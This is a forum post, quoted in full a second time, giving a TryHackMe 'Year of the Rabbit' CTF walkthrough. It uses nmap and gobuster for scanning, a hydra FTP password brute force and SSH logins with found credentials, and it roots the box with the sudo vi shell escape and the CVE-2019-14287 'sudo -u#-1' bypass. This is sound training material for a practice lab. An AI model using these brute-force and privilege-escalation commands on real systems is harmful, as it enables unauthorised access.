TryHackMe | Year of the Rabbit CTF Walkthrough


Yeni üye
9 Şub 2023
Difficulty: Easy

Let's start the new year with a beautiful and smooth start!
Can you hack the Rabbit Year box without falling into a hole?
(Please make sure your sound is on!)
(I am sharing this text because I think it may be related to steganography.)

>So let's start<
After obtaining our IP address, let's perform a classic nmap scan.

nmap -sS -sV -sC -PN -T5
-sS performs a Syn scan.
-sV attempts to determine what service is running on an open port.
-sC uses nmap scripts while performing version detection with -sV.
-PN is used when we don't want to ping.
-T5 is used to adjust the number of threads.


Looking at the results, we see that there are three open ports:
21 ftp
22 ssh
80 http
When we visit the website, we see the Apache2 Debian Default Page.
I examined the source code with the hope of finding something hidden in the code, but I couldn't find anything.
Therefore, let's use gobuster to find hidden pages.
gobuster dir -u -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
dir is the command we use to specify the type of scan we want to perform.
-u is used to specify the URL.
-w is used to define the wordlist.


After waiting a while, I stopped the scan because I thought I wouldn't find anything else :

When we look at the output, we see that there is an .mp4 and a .css file.
First, I start examining style.css with the hope that something is hidden in it.
And we really find a link.

However, when we visit the link, we are redirected to the "Rick Astley - Never Gonna Give You Up" youtube video.
I guess they wanted to send a message that they will never give up examining the code:D
Since we passed through two different pages during the redirect, I decided to examine it with Burp Suite, suspecting that there might be a hidden directory.

And we encounter a link that says there is a hidden directory:
When we go to the link, a Hot_Babe.png file appears.
(Since there are too many images, I didn't include it.)
Let's scan this photo with exiftool.
exiftool Hot_Babe.png
Since we didn't find any usable information, let's examine it with the strings command.

We found our FTP login username "ftpuser"
But since it gave us a lot of passwords, we create a password list from them.
Let's use hydra to perform a brute force attack to find the password.
hydra -l ftpuser -P pass.txt ftp -VV
-l is used to specify the username.
-P is used to define the password list.
ftp is used to specify the attack type.
-VV is used to activate verbose mode.


Now we can establish the FTP connection.
ftp [email protected]
Let's enter our password and establish our connection.
When we run the "ls" command, we see that there is a .txt file.
Let's download this file to our computer with the get Eli's_Creed.txt command.

When we use the "cat" command, we see an encrypted text.
(After some research, I learn that it is encrypted with a method called "Brainfuck".)
We can use the Decoder website from the link to decrypt this text.

As a result, we have a username and password.
In our initial nmap scan, we found 3 open ports.
Since these could be SSH login credentials, let's try to make an SSH connection:
ssh [email protected]

After connecting, we are greeted with a new message:
With this information, let's start searching for "s3cr3t hiding place".

find / -name s3cr3t 2>/dev/null
"/" specifies which directory we want to search in.
-name option specifies what we want to search for.
2>/dev/null option prevents files that we don't have permission to access from being printed.

Using this command, we find the "s3cr3t hiding place".

We use "ls -la" command to list all files.
When we use the "cat" command to print the file, we gain access to another username and password.
To switch to this user, we can use :
su gwendoline
Now that we have successfully switched to this user, let's run "ls" command and get the first flag 🥳
Now it's time to privileges escalation.

We can use the command "sudo -l" to see which commands we can run with root privileges.
We see that we can run the "vi editor" with root privileges and edit the "user.txt" file.
To exploit this vulnerability, we go to the GTFOBins website.
We type "Vi" in the search bar and click on the "Sudo" section from the results.

sudo vi -c ':!/bin/sh' /dev/null
When we run this command, we encounter an error.

To bypass this, we just need to make a few changes. (CVE-2019-14287)
sudo -u#-1 /usr/bin/vi /home/gwendoline/user.txt
In the editor that opens up, we type ": !/bin/bash" and press enter.
Now we are Root 🥳🥳
We can get our last flag and complete the CTF.
(cat /root/root.txt)

Son düzenleme:


Yeni üye
9 Şub 2023
Since this is the first task, please feel free to provide more information than necessary, and I can adjust it for the next task.
My notes: config.txt
Son düzenleme:


7 Şub 2023
Difficulty: Easy

Let's start the new year with a beautiful and smooth start!
Can you hack the Rabbit Year box without falling into a hole?
(Please make sure your sound is on!)
(I am sharing this text because I think it may be related to steganography.)

>So let's start<
After obtaining our IP address, let's perform a classic nmap scan.

nmap -sS -sV -sC -PN -T5
-sS performs a Syn scan.
-sV attempts to determine what service is running on an open port.
-sC uses nmap scripts while performing version detection with -sV.
-PN is used when we don't want to ping.
-T5 is used to adjust the number of threads.


Looking at the results, we see that there are three open ports:
21 ftp
22 ssh
80 http
When we visit the website, we see the Apache2 Debian Default Page.
I examined the source code with the hope of finding something hidden in the code, but I couldn't find anything.
Therefore, let's use gobuster to find hidden pages.
gobuster dir -u -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
dir is the command we use to specify the type of scan we want to perform.
-u is used to specify the URL.
-w is used to define the wordlist.


After waiting a while, I stopped the scan because I thought I wouldn't find anything else :

When we look at the output, we see that there is an .mp4 and a .css file.
First, I start examining style.css with the hope that something is hidden in it.
And we really find a link.

However, when we visit the link, we are redirected to the "Rick Astley - Never Gonna Give You Up" youtube video.
I guess they wanted to send a message that they will never give up examining the code:D
Since we passed through two different pages during the redirect, I decided to examine it with Burp Suite, suspecting that there might be a hidden directory.

And we encounter a link that says there is a hidden directory:
When we go to the link, a Hot_Babe.png file appears.
(Since there are too many images, I didn't include it.)
Let's scan this photo with exiftool.
exiftool Hot_Babe.png
Since we didn't find any usable information, let's examine it with the strings command.

We found our FTP login username "ftpuser"
But since it gave us a lot of passwords, we create a password list from them.
Let's use hydra to perform a brute force attack to find the password.
hydra -l ftpuser -P pass.txt ftp -VV
-l is used to specify the username.
-P is used to define the password list.
ftp is used to specify the attack type.
-VV is used to activate verbose mode.


Now we can establish the FTP connection.
ftp [email protected]
Let's enter our password and establish our connection.
When we run the "ls" command, we see that there is a .txt file.
Let's download this file to our computer with the get Eli's_Creed.txt command.

When we use the "cat" command, we see an encrypted text.
(After some research, I learn that it is encrypted with a method called "Brainfuck".)
We can use the Decoder website from the link to decrypt this text.

As a result, we have a username and password.
In our initial nmap scan, we found 3 open ports.
Since these could be SSH login credentials, let's try to make an SSH connection:
ssh [email protected]

After connecting, we are greeted with a new message:
With this information, let's start searching for "s3cr3t hiding place".

find / -name s3cr3t 2>/dev/null
"/" specifies which directory we want to search in.
-name option specifies what we want to search for.
2>/dev/null option prevents files that we don't have permission to access from being printed.

Using this command, we find the "s3cr3t hiding place".

We use "ls -la" command to list all files.
When we use the "cat" command to print the file, we gain access to another username and password.
To switch to this user, we can use :
su gwendoline
Now that we have successfully switched to this user, let's run "ls" command and get the first flag 🥳
Now it's time to privileges escalation.

We can use the command "sudo -l" to see which commands we can run with root privileges.
We see that we can run the "vi editor" with root privileges and edit the "user.txt" file.
To exploit this vulnerability, we go to the GTFOBins website.
We type "Vi" in the search bar and click on the "Sudo" section from the results.

sudo vi -c ':!/bin/sh' /dev/null
When we run this command, we encounter an error.

To bypass this, we just need to make a few changes. (CVE-2019-14287)
sudo -u#-1 /usr/bin/vi /home/gwendoline/user.txt
In the editor that opens up, we type ": !/bin/bash" and press enter.
Now we are Root 🥳🥳
We can get our last flag and complete the CTF.
(cat /root/root.txt)​
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